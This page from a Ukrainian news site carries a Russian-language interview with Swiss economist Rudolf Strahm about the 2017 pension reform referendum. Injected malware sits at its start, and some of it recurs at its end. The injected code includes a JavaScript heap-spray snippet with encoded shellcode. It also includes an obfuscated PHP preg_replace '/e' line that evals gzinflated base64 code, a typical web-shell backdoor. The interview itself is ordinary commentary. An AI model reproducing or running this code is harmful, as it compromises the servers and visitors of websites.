%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Швейцарский экономист Рудольф Штрам о пенсионной реформе
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Швейцарский экономист Рудольф Штрам о пенсионной реформе

Швейцарский экономист Рудольф Штрам о пенсионной реформе
Швейцарский экономист Рудольф Штрам о пенсионной реформе

Рудольф Штрам (74) принадлежит к числу видных швейцарских политиков и экономистов левого толка, и, тем не менее, он убежденно выступает за пенсионную реформу, общенациональный референдум по которой пройдет в Швейцарии 24-го сентября 2017 года. Почему? Мы поговорили с экспертом.

swissinfo.ch: Система государственного пенсионного страхования была введена в стране в 1948 году, и с тех пор было проведено десять раундов реформирования этого, наверное, самого главного социального завоевания в Швейцарии последних ста лет. Последний раз это произошло в 1997 году. С тех пор все попытки приспособить эту систему к новым реалиям регулярно терпели неудачу. Почему?

Рудольф Штрам (Rudolf Strahm): В Швейцарии не принято, как говориться, шагать широко. Кроме того, в народе как не было, так и нет склонности соглашаться с проектами, предусматривающими сокращение пенсий. Такие проекты были отклонены на референдумах уже три раза. Нет возможности сейчас и повышать налоги. Народ не готов к таким мерам. А вот нынешняя реформа устроена иначе: она предусматривает движение вперед мелкими шажками, она отлично сбалансирована, и в целом в народе, как мне кажется, скорее преобладает склонность согласиться с ней.


swissinfo.ch: Но как можно вообще вдруг начать критиковать систему «AHV», по праву являющуюся важнейшим социально-политическим завоеванием в Швейцарии за последние сто лет?

Р.Ш.: В самом деле, государственное пенсионное страхование является в нашей стране старейшим инструментом социальной поддержки населения в старости. В Швейцарии на данный момент существует прочный политический и межпоколенческий консенсус на предмет того, что именно система «AHV» внесла решающий вклад в социальную стабилизацию страны и в сглаживание порой серьезных социальных противоречий.

Впервые требование ввести такую пенсию в стране было выдвинуто невшательскими социалистами в 1890-е годы, в 1918 году это требование было одним из важнейших тезисов тех, кто устроил в Цюрихе известную генеральную стачку, как раз-таки завершившуюся кровопролитием. И только в 1947 году, после ожесточенной политической борьбы, этот вопрос был вынесен на общешвейцарский референдум, по итогам которого 80% граждан одобрили введение в стране государственного пенсионного страхования.

Тогда среди противников этого проекта были многие предприниматели, включая часть могущественного финансово-страхового сектора, а рупором их была газета «Neue Zurcher Zeitung», которая в 1943 году называла государственное пенсионное обеспечение ничем иным, как «болезненным падением в зараженное уравниловкой огосударствление» частной жизни граждан страны. Противники системы «AHV» были малочисленны, но при этом до краев полны ненавистью к ней.

swissinfo.ch: Многие упрекают лично Вас в том, что, агитируя за реформу «первой» опоры, Вы преднамерено сгущаете краски в том, что касается актуального состояния финансов в рамках «второй опоры».

Р.Ш.: «Вторая опора» является неотъемлемым элементов всей швейцарской системы пенсионного обеспечения, ее никто под вопрос не ставил и ставить не собирается, в том числе и я тоже. Более того, порядок аккумулирования необходимого капитала в рамках «второй опоры» в долгосрочной перспективе отличается даже куда большей стабильностью, прежде всего по причине демографического развития Швейцарии. С другой стороны, на финансовых рынках как мировых, так и швейцарских, сейчас господствует низкий и очень низкий процент на вложенный капитал, а именно там, на финансовых рынках, и располагают пенсионные фонды «второй опоры» свои средства, именно там они зарабатывают нам «прибавку к пенсии». И поскольку в ближайшее время тут явно ничего не изменится, то и получается, что в настоящее время финансировать «вторую опору» стало сложней и дороже.

Швейцарский экономист Рудольф Штрам о пенсионной реформе

swissinfo.ch: Что касается уступок — кто все-таки должен будет пойти на самые большие жертвы?

Р.Ш.: В стороне не останется никто, каждый политический лагерь, с учетом своих идеологических программ, должен будет отказаться от чего-то. Но самую большую жертву, наверное, все-таки должны будут принести левые, согласившись с повышением пенсионного возраста для женщин с 64 до 65 лет. В противном случае им бы оставалась единственная альтернатива — бороться за немедленное решение проблемы неравенства доходов мужчин и женщин. С другой стороны, они могут указать на повышение, на 70 франков, пенсионных выплат по линии «AHV» как на свое достижение и как на компенсацию возникающих убытков.

swissinfo.ch: А кто станет главным бенефициаром реформы Алена Берсе?

Р.Ш.: Скорее всего, наибольшую выгоду от реформы получат те, кто сейчас находится в возрасте от 45 до 64 лет. В случае согласия народа на референдуме с реформой именно это своего рода «переходное» поколение, получит больше денег по линии «AHV», а неизбежные сокращения выплат по линии «второй опоры» начнутся несколько позже. Тот же, кто выйдет на пенсию вот уже сейчас, до 2018 года, тот ничего не потеряет, но ничего и не приобретет.


Что будет с теми, кому сейчас нет 40 лет? Тут трудно что-то предсказывать, потому что мы не знаем, что произойдет за следующие четверть века с мировой экономикой, с миграцией, с рождаемостью или с динамикой развития ставки НДС! Предполагаю, что после 2030 года нам придется еще раз повышать НДС с целью заткнуть дыры в бюджете «первой опоры». Лично я выступаю за повышение НДС, а не за увеличение отчислений за счет работодателей и работников, потому что таким образом мы могли бы привлечь к финансированию пенсий всех, включая состоятельных пенсионеров.

swissinfo.ch: Возможно ли в нынешней Швейцарии создать инструмент социального страхования, схожий с «AHV»?

Р.Ш.: В нынешнем парламенте пробить такую идею было бы невозможно. Социальное государство, на финансирование которого в современной Швейцарии уходит до 25% от ВВП, добралось в своем историческом развитии до момента, когда оно начало стремительно утрачивать свою былую репутацию. При этом речь идет не о финансируемости систем социального страхования, даже с учетом того, мы в Швейцарии имеем, по сравнению с соседними странами, куда более низкие налоги, а именно о репутации и о чисто психологическом доверии к ним. 

Тут мы явно подошли к какой-то черте, хотя лично я, если сравнивать все имеющиеся в Швейцарии системы социального страхования, считаю наш пенсионный механизм в качестве наиболее стабильного, с политической точки зрения, инструмента. А вот где у нас действительно существует опасность секвестра, так это в области социальной помощи, с учетом того, что мы сейчас имеем дело с активным притоком мигрантов из бедных стран, попадающих к нам и сразу же садящихся «на социал».

swissinfo.ch: Что бы Вы могли посоветовать иностранным государствам в плане использования швейцарского опыта совершенствования пенсионной системы?

Р.Ш.: Не хотелось бы, да и трудно это, с умным видом советовать что-то, с учетом того, что наша система пенсионного страхования выросла на почве нашей истории: в 1948 году заработала «первая опора», в 1985 году была введена в качестве обязательной «вторая», и только в 1980-1990-годы мы дошли до налоговых привилегий для тех, кто в добровольном порядке начинает выстраивать собственный план пенсионного обеспечения в рамках «третьей опоры».

Однако хочу подчеркнуть, что в любом случае система, сочетающая в себе механизмы государственного перераспределения финансовых средств с инструментами, позволяющими зарабатывать пенсионные деньги на финансовых рынках, объективно является наиболее оптимальной. Каждый из этих механизмов имеет свои плюсы и минусы. Финансовые рынки, например, особенно в ситуации низкого процента, ограничивают нас в плане выгодного инвестирования активов. «Первая опора», с другой стороны, выгодна тем, что ее бюджет напрямую зависит от того, насколько успешно работает реальный сектор экономики. Недостаток же заключается в том, что, если экономика дает сбой, то страдать приходится, прежде всего, именно госбюджету.

Рудольф Штрам (Rudolf Strahm)

Швейцарский экономист и политик, член партии социал-демократов (Sozialdemokratische Partei).

В период с 1991 по 2004 год был депутатом Национального совета (Nationalrat), большой палаты федерального парламента Швейцарии.

С 2004 по 2008 гг. исполнял обязанности специального уполномоченного правительства Швейцарии по мониторингу ситуации в области динамики развития розничных цен («Preisuberwacher»).

Автор ряда книг, посвященных актуальным вопросам швейцарской экономической политики.



Передает: Швейцарский новостной информационный портал SwissInfo.ch
Просмотров: 816
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/